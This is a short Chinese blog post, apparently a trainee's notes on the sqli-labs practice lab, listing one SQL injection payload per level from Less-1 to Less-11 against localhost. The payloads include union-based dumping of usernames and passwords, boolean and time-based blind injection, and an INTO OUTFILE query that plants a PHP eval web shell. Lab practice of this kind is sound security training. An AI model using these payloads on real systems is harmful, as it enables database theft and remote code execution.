SQLI-Lab实验

最近入职培训了一段时间,感觉自己安全基础还是不够牢固,从头开始学习吧,把《白帽子学Web安全》在看几遍,也给自己立个Flag:每周至少研究一个漏洞的源码,产出报告。

这周把sqli-labs的题目都做一遍,写一遍payload。

Page-1

Less-1:http://localhost/sqli-labs-php7/Less-1/?id=-1' union select 1,group_concat(id,'-',username,'-',password, '---'),3 from  users  -- %20

Less-2:http://localhost/sqli-labs-php7/Less-2/?id=-1 union select 1,group_concat(id,'-',username,'-',password, '---'),3 from  users  -- %20

Less-3:
http://localhost/sqli-labs-php7/Less-3/?id=-1') union select 1,group_concat(id,"-",username,"-",password, "---"),3 from  users  -- %20

Less-4:http://localhost/sqli-labs-php7/Less-4/?id=-1") union select 1,group_concat(id,"-",username,"-",password, "---"),3 from  users  -- %20

Less-5:盲注
//爆库
?id=1' and  ascii(substr((select schema_name from information_schema.schemata limit 1,1),1,1)) >100--+
//爆表
?id=1' and left((select table_name from information_schema.tables where information_schema.tables.table_schema=database() limit 0,1),1)='e' --+
//爆字段
id=1' and left((select column_name from information_schema.columns where table_name='users' and table_schema=database()limit 2,1),8)='password' --+
//爆数据
?id=1' and left((select username from users order by id limit 0,1),4)='Dumb' --+

Less-6 盲注
//爆库
?id=1" and  ascii(substr((select schema_name from information_schema.schemata limit 1,1),1,1)) >100--+
//爆表
?id=1" and left((select table_name from information_schema.tables where information_schema.tables.table_schema=database() limit 0,1),1)='e' --+
//爆字段
id=1" and left((select column_name from information_schema.columns where table_name='users' and table_schema=database()limit 2,1),8)='password' --+
//爆数据
?id=1" and left((select username from users order by id limit 0,1),4)='Dumb' --+

less-7 写文件注入
?id=1'))  union select 1,"<?php @eval($_POST['chopper']);?>",3 into outfile "/Applications/XAMPP/xamppfiles/1.php" --+

less-8 布尔盲注
?id=1' and left((select username from users order by id limit 0,1),4)='dumb'  --+

less-9 单引号时间盲注
?id=1'  and if(left((select username from users order by id limit 0,1),4)='dumb' ,sleep(5),1) --+

less-10 双引号时间盲注
?id=1" and if(left((select username from users order by id limit 0,1),4)='dumb' ,sleep(5),1) --+


less-11
//爆表
' union select 1,group_concat(table_name) from information_schema.tables where table_schema = database() -- 
//爆列
' union select 1,group_concat(column_name) from information_schema.columns where table_name = 'users' and table_schema = database() -- 
//爆数据
' union select 1, group_concat(username,":",password," ") from users --
posted @ 2020-06-24 01:15  kimjun  阅读(277)  评论(0编辑  收藏  举报